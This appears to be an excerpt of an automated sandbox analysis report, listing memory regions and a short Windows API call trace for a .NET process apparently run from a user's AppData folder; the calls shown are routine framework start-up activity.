filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_32\\mscorlib\\36eaccfde177c2e7b93b8dbdde4e012a\\mscorlib.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\mscorlib\\36eaccfde177c2e7b93b8dbdde4e012a\\mscorlib.ni.dll")
Region:
id = 3221
start_va = 0x75850000
end_va = 0x759abfff
monitored = 0
entry_point = 0x7589ba3d
region_type = mapped_file
name = "ole32.dll"
filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll")
Region:
id = 3222
start_va = 0x74610000
end_va = 0x7468ffff
monitored = 0
entry_point = 0x746237c9
region_type = mapped_file
name = "uxtheme.dll"
filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll")
Region:
id = 3223
start_va = 0x4900000
end_va = 0x4aeffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004900000"
filename = ""
Region:
id = 3224
start_va = 0x5a0000
end_va = 0x67efff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000005a0000"
filename = ""
Region:
id = 3225
start_va = 0x2f0000
end_va = 0x2fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000002f0000"
filename = ""
Region:
id = 3226
start_va = 0x74600000
end_va = 0x74602fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "api-ms-win-core-xstate-l2-1-0.dll"
filename = "\\Windows\\SysWOW64\\api-ms-win-core-xstate-l2-1-0.dll" (normalized: "c:\\windows\\syswow64\\api-ms-win-core-xstate-l2-1-0.dll")
Region:
id = 3227
start_va = 0x74570000
end_va = 0x745f8fff
monitored = 1
entry_point = 0x74571130
region_type = mapped_file
name = "clrjit.dll"
filename = "\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\clrjit.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\clrjit.dll")
Region:
id = 3228
start_va = 0x759b0000
end_va = 0x75a3efff
monitored = 0
entry_point = 0x759b3fb1
region_type = mapped_file
name = "oleaut32.dll"
filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll")
Region:
id = 3229
start_va = 0x300000
end_va = 0x30ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000300000"
filename = ""
Region:
id = 3230
start_va = 0x71ac0000
end_va = 0x72514fff
monitored = 1
entry_point = 0x0
region_type = mapped_file
name = "system.ni.dll"
filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System\\2c3c912ea8f058f9d04c4650128feb3f\\System.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system\\2c3c912ea8f058f9d04c4650128feb3f\\system.ni.dll")
Region:
id = 3231
start_va = 0x743c0000
end_va = 0x74562fff
monitored = 1
entry_point = 0x0
region_type = mapped_file
name = "system.drawing.ni.dll"
filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Drawing\\f7568d7f1b9d356f64779b4c0927cfb3\\System.Drawing.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.drawing\\f7568d7f1b9d356f64779b4c0927cfb3\\system.drawing.ni.dll")
Region:
id = 3232
start_va = 0x70c50000
end_va = 0x71ab5fff
monitored = 1
entry_point = 0x0
region_type = mapped_file
name = "system.windows.forms.ni.dll"
filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Windows.Forms\\c9a4cbc00f690a9e3cddfc400f6e85bb\\System.Windows.Forms.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.windows.forms\\c9a4cbc00f690a9e3cddfc400f6e85bb\\system.windows.forms.ni.dll")
Region:
id = 3233
start_va = 0x6d2b0000
end_va = 0x6d853fff
monitored = 1
entry_point = 0x6d83b692
region_type = mapped_file
name = "system.windows.forms.dll"
filename = "\\Windows\\Microsoft.NET\\assembly\\GAC_MSIL\\System.Windows.Forms\\v4.0_4.0.0.0__b77a5c561934e089\\System.Windows.Forms.dll" (normalized: "c:\\windows\\microsoft.net\\assembly\\gac_msil\\system.windows.forms\\v4.0_4.0.0.0__b77a5c561934e089\\system.windows.forms.dll")
Region:
id = 3234
start_va = 0x310000
end_va = 0x311fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000310000"
filename = ""
Region:
id = 3235
start_va = 0x70430000
end_va = 0x70c47fff
monitored = 1
entry_point = 0x0
region_type = mapped_file
name = "system.core.ni.dll"
filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Core\\31fae3290fad30c31c98651462d22724\\System.Core.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.core\\31fae3290fad30c31c98651462d22724\\system.core.ni.dll")
Region:
id = 3236
start_va = 0x742b0000
end_va = 0x743b4fff
monitored = 1
entry_point = 0x0
region_type = mapped_file
name = "system.configuration.ni.dll"
filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Configuration\\96f7edb07b12303f0ec2595c7f3778c7\\System.Configuration.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.configuration\\96f7edb07b12303f0ec2595c7f3778c7\\system.configuration.ni.dll")
Region:
id = 3237
start_va = 0x320000
end_va = 0x32ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000320000"
filename = ""
Region:
id = 3238
start_va = 0x6fcb0000
end_va = 0x70423fff
monitored = 1
entry_point = 0x0
region_type = mapped_file
name = "system.xml.ni.dll"
filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Xml\\15af16d373cf0528cb74fc73d365fdbf\\System.Xml.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.xml\\15af16d373cf0528cb74fc73d365fdbf\\system.xml.ni.dll")
Region:
id = 3239
start_va = 0x74290000
end_va = 0x742a2fff
monitored = 1
entry_point = 0x7429d900
region_type = mapped_file
name = "nlssorting.dll"
filename = "\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\nlssorting.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\nlssorting.dll")
Region:
id = 3240
start_va = 0x4af0000
end_va = 0x4dc1fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "sortdefault.nlp"
filename = "\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\sortdefault.nlp" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\sortdefault.nlp")
Region:
id = 3241
start_va = 0x75c40000
end_va = 0x76889fff
monitored = 0
entry_point = 0x75cc1601
region_type = mapped_file
name = "shell32.dll"
filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll")
Region:
id = 3242
start_va = 0x420000
end_va = 0x420fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000420000"
filename = ""
Region:
id = 3243
start_va = 0x74280000
end_va = 0x7428afff
monitored = 0
entry_point = 0x74281992
region_type = mapped_file
name = "profapi.dll"
filename = "\\Windows\\SysWOW64\\profapi.dll" (normalized: "c:\\windows\\syswow64\\profapi.dll")
Region:
id = 3244
start_va = 0x4390000
end_va = 0x445ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004390000"
filename = ""
Region:
id = 3245
start_va = 0x74260000
end_va = 0x74276fff
monitored = 0
entry_point = 0x742635fa
region_type = mapped_file
name = "bcrypt.dll"
filename = "\\Windows\\SysWOW64\\bcrypt.dll" (normalized: "c:\\windows\\syswow64\\bcrypt.dll")
Region:
id = 3246
start_va = 0x74240000
end_va = 0x74256fff
monitored = 0
entry_point = 0x74243573
region_type = mapped_file
name = "cryptsp.dll"
filename = "\\Windows\\SysWOW64\\cryptsp.dll" (normalized: "c:\\windows\\syswow64\\cryptsp.dll")
Region:
id = 3247
start_va = 0x530000
end_va = 0x56bfff
monitored = 0
entry_point = 0x53128d
region_type = mapped_file
name = "rsaenh.dll"
filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll")
Region:
id = 3248
start_va = 0x530000
end_va = 0x56bfff
monitored = 0
entry_point = 0x53128d
region_type = mapped_file
name = "rsaenh.dll"
filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll")
Region:
id = 3249
start_va = 0x530000
end_va = 0x56bfff
monitored = 0
entry_point = 0x53128d
region_type = mapped_file
name = "rsaenh.dll"
filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll")
Region:
id = 3250
start_va = 0x530000
end_va = 0x56bfff
monitored = 0
entry_point = 0x53128d
region_type = mapped_file
name = "rsaenh.dll"
filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll")
Region:
id = 3251
start_va = 0x530000
end_va = 0x56bfff
monitored = 0
entry_point = 0x53128d
region_type = mapped_file
name = "rsaenh.dll"
filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll")
Region:
id = 3252
start_va = 0x74200000
end_va = 0x7423afff
monitored = 0
entry_point = 0x7420128d
region_type = mapped_file
name = "rsaenh.dll"
filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll")
Region:
id = 3253
start_va = 0x4390000
end_va = 0x4411fff
monitored = 0
entry_point = 0x43919a9
region_type = mapped_file
name = "comctl32.dll"
filename = "\\Windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\\comctl32.dll")
Region:
id = 3254
start_va = 0x4420000
end_va = 0x445ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004420000"
filename = ""
Region:
id = 3255
start_va = 0x4390000
end_va = 0x4411fff
monitored = 0
entry_point = 0x43919a9
region_type = mapped_file
name = "comctl32.dll"
filename = "\\Windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\\comctl32.dll")
Region:
id = 3256
start_va = 0x74170000
end_va = 0x741f3fff
monitored = 0
entry_point = 0x741719a9
region_type = mapped_file
name = "comctl32.dll"
filename = "\\Windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\\comctl32.dll")
Region:
id = 3257
start_va = 0x4900000
end_va = 0x4a6ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004900000"
filename = ""
Region:
id = 3258
start_va = 0x4ab0000
end_va = 0x4aeffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004ab0000"
filename = ""
Region:
id = 3259
start_va = 0x430000
end_va = 0x43ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000430000"
filename = ""
Region:
id = 3260
start_va = 0x4c0000
end_va = 0x4cffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000004c0000"
filename = ""
Region:
id = 3261
start_va = 0x4d0000
end_va = 0x4dffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000004d0000"
filename = ""
Region:
id = 3262
start_va = 0x73fe0000
end_va = 0x7416ffff
monitored = 0
entry_point = 0x7407d026
region_type = mapped_file
name = "gdiplus.dll"
filename = "\\Windows\\winsxs\\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\\GdiPlus.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\\gdiplus.dll")
Region:
id = 3263
start_va = 0x530000
end_va = 0x57ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000530000"
filename = ""
Region:
id = 3264
start_va = 0x4c0000
end_va = 0x4dbfff
monitored = 1
entry_point = 0x0
region_type = mapped_file
name = "gdipfontcachev1.dat"
filename = "\\Users\\kEecfMwgj\\AppData\\Local\\GDIPFONTCACHEV1.DAT" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\gdipfontcachev1.dat")
Region:
id = 3265
start_va = 0x4950000
end_va = 0x498ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004950000"
filename = ""
Region:
id = 3266
start_va = 0x4a60000
end_va = 0x4a6ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004a60000"
filename = ""
Region:
id = 3267
start_va = 0x4e90000
end_va = 0x4f8ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004e90000"
filename = ""
Region:
id = 3268
start_va = 0x7efaa000
end_va = 0x7efacfff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007efaa000"
filename = ""
Region:
id = 3269
start_va = 0x4f90000
end_va = 0x508ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004f90000"
filename = ""
Region:
id = 3270
start_va = 0x4460000
end_va = 0x450afff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tahoma.ttf"
filename = "\\Windows\\Fonts\\tahoma.ttf" (normalized: "c:\\windows\\fonts\\tahoma.ttf")
Region:
id = 3271
start_va = 0x4460000
end_va = 0x450afff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tahoma.ttf"
filename = "\\Windows\\Fonts\\tahoma.ttf" (normalized: "c:\\windows\\fonts\\tahoma.ttf")
Region:
id = 3272
start_va = 0x5090000
end_va = 0x6538fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "msjh.ttf"
filename = "\\Windows\\Fonts\\msjh.ttf" (normalized: "c:\\windows\\fonts\\msjh.ttf")
Region:
id = 3273
start_va = 0x5090000
end_va = 0x6538fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "msjh.ttf"
filename = "\\Windows\\Fonts\\msjh.ttf" (normalized: "c:\\windows\\fonts\\msjh.ttf")
Region:
id = 3274
start_va = 0x5090000
end_va = 0x6552fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "msyh.ttf"
filename = "\\Windows\\Fonts\\msyh.ttf" (normalized: "c:\\windows\\fonts\\msyh.ttf")
Region:
id = 3275
start_va = 0x5090000
end_va = 0x6552fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "msyh.ttf"
filename = "\\Windows\\Fonts\\msyh.ttf" (normalized: "c:\\windows\\fonts\\msyh.ttf")
Region:
id = 3276
start_va = 0x5090000
end_va = 0x54b2fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "malgun.ttf"
filename = "\\Windows\\Fonts\\malgun.ttf" (normalized: "c:\\windows\\fonts\\malgun.ttf")
Region:
id = 3277
start_va = 0x5090000
end_va = 0x54b2fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "malgun.ttf"
filename = "\\Windows\\Fonts\\malgun.ttf" (normalized: "c:\\windows\\fonts\\malgun.ttf")
Region:
id = 3278
start_va = 0x4460000
end_va = 0x44fffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "micross.ttf"
filename = "\\Windows\\Fonts\\micross.ttf" (normalized: "c:\\windows\\fonts\\micross.ttf")
Region:
id = 3279
start_va = 0x4460000
end_va = 0x44fffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "micross.ttf"
filename = "\\Windows\\Fonts\\micross.ttf" (normalized: "c:\\windows\\fonts\\micross.ttf")
Region:
id = 3280
start_va = 0x4390000
end_va = 0x440efff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "segoeui.ttf"
filename = "\\Windows\\Fonts\\segoeui.ttf" (normalized: "c:\\windows\\fonts\\segoeui.ttf")
Region:
id = 3281
start_va = 0x4390000
end_va = 0x440efff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "segoeui.ttf"
filename = "\\Windows\\Fonts\\segoeui.ttf" (normalized: "c:\\windows\\fonts\\segoeui.ttf")
Region:
id = 3282
start_va = 0x5090000
end_va = 0x528ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000005090000"
filename = ""
Region:
id = 3283
start_va = 0x5290000
end_va = 0x544ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000005290000"
filename = ""
Region:
id = 3284
start_va = 0x4460000
end_va = 0x451cfff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "arial.ttf"
filename = "\\Windows\\Fonts\\arial.ttf" (normalized: "c:\\windows\\fonts\\arial.ttf")
Region:
id = 3285
start_va = 0x4460000
end_va = 0x451cfff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "arial.ttf"
filename = "\\Windows\\Fonts\\arial.ttf" (normalized: "c:\\windows\\fonts\\arial.ttf")
Region:
id = 3286
start_va = 0x4460000
end_va = 0x4516fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "arialbd.ttf"
filename = "\\Windows\\Fonts\\arialbd.ttf" (normalized: "c:\\windows\\fonts\\arialbd.ttf")
Region:
id = 3287
start_va = 0x4460000
end_va = 0x4516fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "arialbd.ttf"
filename = "\\Windows\\Fonts\\arialbd.ttf" (normalized: "c:\\windows\\fonts\\arialbd.ttf")
Region:
id = 3288
start_va = 0x4390000
end_va = 0x4417fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "ariali.ttf"
filename = "\\Windows\\Fonts\\ariali.ttf" (normalized: "c:\\windows\\fonts\\ariali.ttf")
Region:
id = 3289
start_va = 0x4390000
end_va = 0x4417fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "ariali.ttf"
filename = "\\Windows\\Fonts\\ariali.ttf" (normalized: "c:\\windows\\fonts\\ariali.ttf")
Region:
id = 3290
start_va = 0x4390000
end_va = 0x4419fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "arialbi.ttf"
filename = "\\Windows\\Fonts\\arialbi.ttf" (normalized: "c:\\windows\\fonts\\arialbi.ttf")
Region:
id = 3291
start_va = 0x4390000
end_va = 0x4419fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "arialbi.ttf"
filename = "\\Windows\\Fonts\\arialbi.ttf" (normalized: "c:\\windows\\fonts\\arialbi.ttf")
Region:
id = 3292
start_va = 0x5450000
end_va = 0x5d7ffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "staticcache.dat"
filename = "\\Windows\\Fonts\\StaticCache.dat" (normalized: "c:\\windows\\fonts\\staticcache.dat")
Region:
id = 3293
start_va = 0x430000
end_va = 0x430fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000430000"
filename = ""
Region:
id = 3294
start_va = 0x6f890000
end_va = 0x6fcabfff
monitored = 1
entry_point = 0x0
region_type = mapped_file
name = "windowsbase.ni.dll"
filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_32\\WindowsBase\\1a4cc316fb6d09525321fc0be44692d8\\WindowsBase.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\windowsbase\\1a4cc316fb6d09525321fc0be44692d8\\windowsbase.ni.dll")
Region:
id = 3295
start_va = 0x6ec50000
end_va = 0x6f88bfff
monitored = 1
entry_point = 0x0
region_type = mapped_file
name = "presentationcore.ni.dll"
filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_32\\PresentationCore\\468f4e17be144ca12a73a4297eacc9cc\\PresentationCore.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\presentationcore\\468f4e17be144ca12a73a4297eacc9cc\\presentationcore.ni.dll")
Region:
id = 3296
start_va = 0x6d860000
end_va = 0x6ec42fff
monitored = 1
entry_point = 0x0
region_type = mapped_file
name = "presentationframework.ni.dll"
filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_32\\Presentatio5ae0f00f#\\252cc7b0fae8cfe083bdc149957c0c54\\PresentationFramework.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\presentatio5ae0f00f#\\252cc7b0fae8cfe083bdc149957c0c54\\presentationframework.ni.dll")
Region:
id = 3297
start_va = 0xcf0000
end_va = 0xd51fff
monitored = 1
entry_point = 0x0
region_type = mapped_file
name = "mscorrc.dll"
filename = "\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorrc.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\mscorrc.dll")
Region:
id = 3298
start_va = 0x4c0000
end_va = 0x4cffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000004c0000"
filename = ""
Region:
id = 3299
start_va = 0x4d0000
end_va = 0x4dffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000004d0000"
filename = ""
Region:
id = 3300
start_va = 0x4e0000
end_va = 0x4effff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000004e0000"
filename = ""
Region:
id = 3301
start_va = 0x530000
end_va = 0x53ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000530000"
filename = ""
Region:
id = 3302
start_va = 0x570000
end_va = 0x57ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000570000"
filename = ""
Region:
id = 3303
start_va = 0x4e0000
end_va = 0x4effff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000004e0000"
filename = ""
Region:
id = 3304
start_va = 0x530000
end_va = 0x53ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000530000"
filename = ""
Region:
id = 3305
start_va = 0x540000
end_va = 0x54ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000540000"
filename = ""
Region:
id = 3306
start_va = 0x4e0000
end_va = 0x4effff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000004e0000"
filename = ""
Region:
id = 3307
start_va = 0x4490000
end_va = 0x44cffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004490000"
filename = ""
Region:
id = 3308
start_va = 0x5db0000
end_va = 0x5eaffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000005db0000"
filename = ""
Region:
id = 3309
start_va = 0x7efa7000
end_va = 0x7efa9fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007efa7000"
filename = ""
Region:
id = 3310
start_va = 0x5eb0000
end_va = 0x6eaffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000005eb0000"
filename = ""
Region:
id = 3311
start_va = 0x5290000
end_va = 0x53effff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000005290000"
filename = ""
Region:
id = 3312
start_va = 0x5410000
end_va = 0x544ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000005410000"
filename = ""
Region:
id = 3313
start_va = 0x6eb0000
end_va = 0x7eaffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000006eb0000"
filename = ""
Region:
id = 3314
start_va = 0x7eb0000
end_va = 0x815ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000007eb0000"
filename = ""
Region:
id = 3315
start_va = 0x4e0000
end_va = 0x4effff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000004e0000"
filename = ""
Region:
id = 3316
start_va = 0x4e0000
end_va = 0x4effff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000004e0000"
filename = ""
Thread:
id = 74
os_tid = 0x534
[0273.016] CoInitializeEx (pvReserved=0x0, dwCoInit=0x2) returned 0x0
[0273.620] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\.NETFramework\\AppContext", ulOptions=0x0, samDesired=0x20019, phkResult=0x16ebd0 | out: phkResult=0x16ebd0*=0x0) returned 0x2
[0273.620] RegCloseKey (hKey=0x80000002) returned 0x0
[0273.627] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Windows.Forms\\v4.0_4.0.0.0__b77a5c561934e089\\System.Windows.Forms.dll", nBufferLength=0x105, lpBuffer=0x16ee54, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Windows.Forms\\v4.0_4.0.0.0__b77a5c561934e089\\System.Windows.Forms.dll", lpFilePart=0x0) returned 0x77
[0273.645] IsAppThemed () returned 0x1
[0273.649] CoTaskMemAlloc (cb=0xf0) returned 0x705f58
[0273.649] CreateActCtxA (pActCtx=0x16f378) returned 0x70614c
[0273.657] CoTaskMemFree (pv=0x705f58)
[0273.668] RegisterClipboardFormatW (lpszFormat="WM_GETCONTROLNAME") returned 0xc104
[0273.668] RegisterClipboardFormatW (lpszFormat="WM_GETCONTROLTYPE") returned 0xc105
[0273.942] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\nFxIoujoILCO.exe.config", nBufferLength=0x105, lpBuffer=0x16ecd0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\nFxIoujoILCO.exe.config", lpFilePart=0x0) returned 0x3a
[0274.051] GetCurrentProcess () returned 0xffffffff
[0274.052] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x16f008 | out: TokenHandle=0x16f008*=0x1f0) returned 1
[0274.058] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\", nBufferLength=0x105, lpBuffer=0x16eac0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\", lpFilePart=0x0) returned 0x2e
[0274.073] GetFileAttributesExW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Config\\machine.config" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\config\\machine.config"), fInfoLevelId=0x0, lpFileInformation=0x16f000 | out: lpFileInformation=0x16f000*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc63fb400, ftCreationTime.dwHighDateTime=0x1d4e4ee, ftLastAccessTime.dwLowDateTime=0xb9f350b0, ftLastAccessTime.dwHighDateTime=0x1d706ae, ftLastWriteTime.dwLowDateTime=0xc63fb400, ftLastWriteTime.dwHighDateTime=0x1d4e4ee, nFileSizeHigh=0x0, nFileSizeLow=0x8c8e)) returned 1
[0274.075] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Config\\machine.config", nBufferLength=0x105, lpBuffer=0x16ea8c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Config\\machine.config", lpFilePart=0x0) returned 0x43
[0274.076] GetFileAttributesExW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Config\\machine.config" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\config\\machine.config"), fInfoLevelId=0x0, lpFileInformation=0x16f008 | out: lpFileInformation=0x16f008*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc63fb400, ftCreationTime.dwHighDateTime=0x1d4e4ee, ftLastAccessTime.dwLowDateTime=0xb9f350b0, ftLastAccessTime.dwHighDateTime=0x1d706ae, ftLastWriteTime.dwLowDateTime=0xc63fb400, ftLastWriteTime.dwHighDateTime=0x1d4e4ee, nFileSizeHigh=0x0, nFileSizeLow=0x8c8e)) returned 1
[0274.078] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Config\\machine.config", nBufferLength=0x105, lpBuffer=0x16ea28, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Config\\machine.config", lpFilePart=0x0) returned 0x43
[0274.080] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x16ef40) returned 1
[0274.081] CreateFileW (lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Config\\machine.config" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\config\\machine.config"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x40
[0274.082] GetFileType (hFile=0x40) returned 0x1
[0274.082] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x16ef3c) returned 1
[0274.082] GetFileType (hFile=0x40) returned 0x1
[0274.111] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\config\\machine.config", nBufferLength=0x105, lpBuffer=0x16e278, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\config\\machine.config", lpFilePart=0x0) returned 0x43
